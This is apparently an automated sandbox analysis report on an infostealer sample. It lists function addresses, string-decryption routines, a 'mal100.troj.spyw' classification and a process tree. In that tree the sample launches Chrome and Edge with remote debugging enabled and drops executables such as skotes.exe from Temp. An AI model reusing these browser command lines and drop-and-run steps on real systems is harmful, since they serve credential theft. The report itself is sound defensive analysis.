Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64C670	0_2_6C64C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C664640	0_2_6C664640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C692E4E	0_2_6C692E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669E50	0_2_6C669E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C683E50	0_2_6C683E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A9E30	0_2_6C6A9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695600	0_2_6C695600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C687E10	0_2_6C687E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B76E3	0_2_6C6B76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64BEF0	0_2_6C64BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65FEF0	0_2_6C65FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A4EA0	0_2_6C6A4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AE680	0_2_6C6AE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665E90	0_2_6C665E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C659F00	0_2_6C659F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C687710	0_2_6C687710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64DFE0	0_2_6C64DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C676FF0	0_2_6C676FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6977A0	0_2_6C6977A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68F070	0_2_6C68F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C668850	0_2_6C668850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D850	0_2_6C66D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B820	0_2_6C68B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C694820	0_2_6C694820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C657810	0_2_6C657810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66C0E0	0_2_6C66C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6858E0	0_2_6C6858E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B50C7	0_2_6C6B50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6760A0	0_2_6C6760A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D960	0_2_6C65D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69B970	0_2_6C69B970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB170	0_2_6C6BB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66A940	0_2_6C66A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64C9A0	0_2_6C64C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D9B0	0_2_6C67D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C685190	0_2_6C685190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2990	0_2_6C6A2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C689A60	0_2_6C689A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C661AF0	0_2_6C661AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68E2F0	0_2_6C68E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C688AC0	0_2_6C688AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6422A0	0_2_6C6422A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674AA0	0_2_6C674AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65CAB0	0_2_6C65CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B2AB0	0_2_6C6B2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BBA90	0_2_6C6BBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C370	0_2_6C65C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C645340	0_2_6C645340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68D320	0_2_6C68D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B53C8	0_2_6C6B53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64F380	0_2_6C64F380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FAC60	0_2_6C6FAC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CAC30	0_2_6C7CAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B6C00	0_2_6C7B6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74ECD0	0_2_6C74ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EECC0	0_2_6C6EECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BED70	0_2_6C7BED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C87CDC0	0_2_6C87CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C878D20	0_2_6C878D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81AD50	0_2_6C81AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F4DB0	0_2_6C6F4DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C786D90	0_2_6C786D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78EE70	0_2_6C78EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D0E20	0_2_6C7D0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FAEC0	0_2_6C6FAEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C790EC0	0_2_6C790EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C776E90	0_2_6C776E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B2F70	0_2_6C7B2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C838FB0	0_2_6C838FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75EF40	0_2_6C75EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F6F10	0_2_6C6F6F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CEFF0	0_2_6C7CEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F0FE0	0_2_6C6F0FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C830F20	0_2_6C830F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FEFB0	0_2_6C6FEFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C4840	0_2_6C7C4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C740820	0_2_6C740820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77A820	0_2_6C77A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F68E0	0_2_6C7F68E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C728960	0_2_6C728960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80C9E0	0_2_6C80C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C746900	0_2_6C746900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7249F0	0_2_6C7249F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B09B0	0_2_6C7B09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7809A0	0_2_6C7809A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AA9A0	0_2_6C7AA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76CA70	0_2_6C76CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A8A30	0_2_6C7A8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79EA00	0_2_6C79EA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76EA80	0_2_6C76EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F6BE0	0_2_6C7F6BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F8BAC	0_2_6C6F8BAC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C790BA0	0_2_6C790BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81A480	0_2_6C81A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C708460	0_2_6C708460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77A430	0_2_6C77A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C754420	0_2_6C754420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7364D0	0_2_6C7364D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78A4D0	0_2_6C78A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C790570	0_2_6C790570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C752560	0_2_6C752560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C748540	0_2_6C748540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F4540	0_2_6C7F4540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77E5F0	0_2_6C77E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BA5E0	0_2_6C7BA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C838550	0_2_6C838550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E45B0	0_2_6C6E45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74C650	0_2_6C74C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74E6E0	0_2_6C74E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78E6E0	0_2_6C78E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7146D0	0_2_6C7146D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C770700	0_2_6C770700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71A7D0	0_2_6C71A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73E070	0_2_6C73E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B8010	0_2_6C7B8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BC000	0_2_6C7BC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7000B0	0_2_6C7000B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CC0B0	0_2_6C7CC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E8090	0_2_6C6E8090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C758140	0_2_6C758140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C766130	0_2_6C766130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D4130	0_2_6C7D4130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F01E0	0_2_6C6F01E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C778260	0_2_6C778260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C788250	0_2_6C788250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8762C0	0_2_6C8762C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C8220	0_2_6C7C8220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BA210	0_2_6C7BA210
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_008878BB	21_2_008878BB
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_00887049	21_2_00887049
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_00888860	21_2_00888860
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_008831A8	21_2_008831A8
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_00844B30	21_2_00844B30
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_00844DE0	21_2_00844DE0
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_00882D10	21_2_00882D10
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_0088779B	21_2_0088779B
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_00877F36	21_2_00877F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_001A7049	22_2_001A7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_001A8860	22_2_001A8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_001A78BB	22_2_001A78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_001A31A8	22_2_001A31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00164B30	22_2_00164B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_001A2D10	22_2_001A2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00164DE0	22_2_00164DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00197F36	22_2_00197F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_001A779B	22_2_001A779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0016E530	23_2_0016E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00186192	23_2_00186192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_001A8860	23_2_001A8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00164B30	23_2_00164B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_001A2D10	23_2_001A2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00164DE0	23_2_00164DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00180E13	23_2_00180E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_001A7049	23_2_001A7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_001A31A8	23_2_001A31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00181602	23_2_00181602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_001A779B	23_2_001A779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_001A78BB	23_2_001A78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00183DF1	23_2_00183DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00197F36	23_2_00197F36

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C87DAE0 appears 47 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C87D930 appears 38 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6894D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C719B10 appears 42 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C67CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C713620 appears 52 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C8709D0 appears 201 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0017DF80 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00198E10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 001780C0 appears 263 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0017D64E appears 66 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00177A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0017D663 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0017D942 appears 85 times
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: String function: 008580C0 appears 130 times

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2581794875.000000006C8C5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2581050850.000000006C6D2000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: juusqcgn ZLIB complexity 0.9949216411628256
Source: random[1].exe.0.dr	Static PE information: Section: juusqcgn ZLIB complexity 0.9949216411628256

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@77/289@33/18

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6A7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C6A7030

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\EAPA0I9F.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1684:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\4764d088-b841-457e-b1e8-cac206941ac7.tmp

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2316581563.000000001D039000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2239887553.000000001D045000.00000004.00000020.00020000.00000000.sdmp, GHJDBAKEHDHDGCAKKJJE.0.dr, EHCBAAAFHJDHJJKEBGHI.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

Virustotal: Detection: 51%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2540 --field-trial-handle=2480,i,12669535664876434942,9463197344397114714,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2112,i,15661409552434283723,8671285796704867672,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2768 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6760 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7196 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsHCFBFBAEBK.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsHCFBFBAEBK.exe "C:\Users\user\DocumentsHCFBFBAEBK.exe"
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe "C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
